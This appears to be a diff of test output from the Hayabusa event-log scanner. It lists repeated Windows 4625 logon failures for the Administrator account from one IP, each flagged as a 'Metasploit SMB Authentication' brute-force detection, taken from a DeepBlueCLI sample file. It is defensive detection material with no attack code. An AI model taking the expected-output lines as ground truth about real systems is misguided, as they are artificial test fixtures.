+2016-09-20 01:50:41.624 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hA20OdabfW5DMphV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.624 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.665 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Ex5Awm2zaVhvAMTH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.665 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: I72BOMPQHyyP374g  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.724 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.790 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 4al5pUa4mKfbL734  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.790 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.830 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: UNHH8ESWZ4Rx6K93  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.830 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.873 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5ay3XdxRFXXaD4Ib  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.873 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.920 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 1PgyG7spUL5glkVh  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.920 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 6D6PVnrIODwtcIXN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.956 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.999 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: cRZgqmQbL3l7KTke  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:41.999 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.032 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HYGKv2l0s9XZnqkl  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.032 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.078 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: wX2R08dxiEcRNzcM  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.078 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.120 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HcN791fdSHwaWuBC  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.120 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.153 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: CRObbkQsykQma2Tn  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.153 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.194 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: v4UvU7VglbA2p0Z9  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.194 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.224 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8ODkwHD0dwGaWhVH  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.224 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.272 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5bPQ5GsX1UUXA6ws  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.272 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.320 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: bvRQ0dVaLawXoo2O  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.320 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.359 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BjxwDdOYBDDSJGun  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.359 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.396 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: czlTDa1F6edSUBdy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.396 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.436 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: Mrtgv5HAqRuelEvF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.436 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.484 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: gfny9Y4SGRZTUXi7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.484 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.527 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hdhoRgnyj4JPpN2j  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.527 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.568 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: K4Qclkpq5ZMKmdCB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.568 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.612 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 0GdZSrcqmfGBfAVy  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.612 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.655 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: XA7eJrFopzOb3YQS  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.655 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.689 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 2XoSwawv7Ji26GQT  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.689 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.729 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 637CaCAc9u7z99X7  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.729 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.777 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5Y6Pww45qxQjrZ0C  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.777 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.822 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5CPU20SF5i6Cdq34  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.822 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HAdaPDVTws6TObvK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.860 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.901 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: KUCoisntgbX7Mnis  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.901 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.952 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MFN0b769jRyDxyAW  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.952 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.993 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: HKr2OCyezvSEsHBZ  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:42.993 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.034 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: QN3snXM4mwhauvvF  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.034 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.163 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: J1VpvQgnwXVxRY1u  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.163 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.233 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: p5bsnUZjpHrbD6kN  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.233 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.286 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: hpL2QnQ0kKqU40a6  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.286 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.369 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: rpkpNfeTsOeXEsJ0  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.369 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.400 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 5mBhuTFm02IjipEw  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.400 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.443 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: yZ908ZOCkSBC7tms  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.443 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.487 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: 8l7Bct5nMTZHd5mK  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.487 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.522 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: lRk6e7SrInMDsdMV  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.522 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: MhGByctTcM7NXGtB  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.560 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: BgzhW3Pd5JAB8j4f  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.604 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.643 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: GZOm1J5kdItrQpGL  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.643 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
+2016-09-20 01:50:43.680 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator  :  Type: 3  :  Workstation: DK77Hylw8CJHVGvb  :  IP Address: 192.168.198.149  :  AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
